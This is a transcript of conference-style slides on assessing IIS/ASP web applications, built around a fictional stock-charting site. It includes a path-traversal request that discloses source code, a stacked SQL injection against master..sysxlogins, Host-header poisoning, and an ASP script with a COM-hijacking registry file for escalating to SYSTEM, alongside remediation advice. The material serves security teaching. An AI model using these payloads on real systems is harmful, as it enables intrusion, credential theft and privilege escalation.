Application Assessments on IIS
Transcript of Application Assessments on IIS
What is an Application Assessment?
Part of a network vulnerability assessment
Application provides the site functionality
The application is the least tested component but often proves to be the greatest risk
Vulnerability Scanners
• Cybercop
• I. S. S.
• Cerberus Internet Scanner
What scanners do do
They highlight known vulnerabilities in COTS products
Webhits.dll and null.htw
MSADC and RDS
Ism.dll and .htr overflow
%C0%AF UNICODE issue
What scanners don’t do
They won’t assess your application
Assessing the Application
What services does the site offer?
What functionality exists to provide these services?
What drives this functionality?
How does it do this?
Stocks-r-us.com
• Free charting service of current/real-time market trends
• A subscriber service providing detailed market analysis
• An "I've forgotten my password" service
• A contact service
• Apply for a job with stocks-r-us.com online service
Free charting service of current/real-time market trends
• From a web form a user chooses the stock market
• They also choose a time range
• On submitting, a page called read_img.asp returns a graph of the ups and downs of the market:
http://www.stocks-r-us.com/read_img.asp?IDN=00000008&IFN=AXYZPQ&IFE=png
http://www.stocks-r-us.com/read_img.asp?IDN=&IFN=&IFE=
Exception Handling
ASP Error 800814:
Create object failed in /includes/olectra.inc
Downloading the .inc file reveals nothing, but there are two issues here: bad exception handling, and the .inc extension has not been mapped to asp.dll
A search on Google reveals Olectra Chart
Source code revelation!
Olectra creates a virtual directory called /octemp
When a graph or chart is produced a temp directory is created in the /octemp directory. This directory’s name is a number like “00000008”
The dynamically produced graph is a random string of letters such as “AXYZPQ” and has a file extension of .png
/read_img.asp?IDN=../&IFN=read_img&IFE=asp
SQL Queries
strSQL = "select price from stocks where name = '" _
    & Request.QueryString("company") & "'"
This code is insecure!!!
Why?
By setting the "company" parameter to something such as:
ISSX' select * from master..sysxlogins
the server would execute the two queries in batch mode:
select price from stocks where name = 'ISSX' select * from master..sysxlogins
'sa' login on MS SQL Server
xp_cmdshell extended stored procedure
On its own, ASP will not escape a single ' (quote mark);
.idc files will.
Change all single quotes provided in a parameter to 0x27 or strip them out
Consideration for integer input
strSQL = "Select company from stocks where price > " & Request.QueryString("price")
Again we can insert an arbitrary SQL query here and have it execute.
Verifying numeric input
IsNumeric() for VBScript
isNaN() for JScript
r.f.p – Rain Forest Puppy
http://www.wiretrip.net/rfp
Contact Service
<%
..
Set SMTPObj = GetObject("IIS://" & Request.ServerVariables("SERVER_NAME") & "/SMTPSVC")
..
%>
HTTP SERVER_NAME Poisoning
"Host:" HTTP client header field
• Learn the password hash for the IWAM account
• Enumerate SQL servers
• Proxy attacks
• Samples on IIS
• ADSI, Corba and COM
On-line job application service
As part of this service stocks-r-us.com allows uploading of curricula vitae / résumés
Client-side checking doesn't work
Scripting enabled on the /cvtemp virtual directory
Gaining SYSTEM Privileges using ASP
• IIS Security Model
• IUSR and IWAM accounts
Wscript.Shell Object
Set WSObj = CreateObject("wscript.shell")
• Read from the Registry
• Write to the Registry
• Execute commands
<%
Dim WshShell, strCMD, strCMD2, result
strCMD = "cmd.exe /c c:\inetpub\wwwroot\msi.reg"
strCMD2 = "cmd.exe /c c:\inetpub\wwwroot\msi.msi"
Set WshShell = Server.CreateObject("Wscript.Shell")
On Error Resume Next
result = WshShell.Run(strCMD)
result = WshShell.Run(strCMD2)
%>
MSI.ASP
REGEDIT4
[HKEY_CLASSES_ROOT\CLSID\{000C103E-0000-0000-C000-000000000046}\InProcServer32]
@="c:\\inetpub\\wwwroot\\foo.dll"
"ThreadingModel"="Both"
MSI.REG
Summary
• Understand the technology you’re dealing with
• Never trust user input – anywhere
• Ensure permissions are set properly
• Don’t trust third-party software until truly evaluated
• Don’t rely on client side checking
• Scanners won’t find these problems – you will
Questions?
Thanks, and enjoy the rest of the day!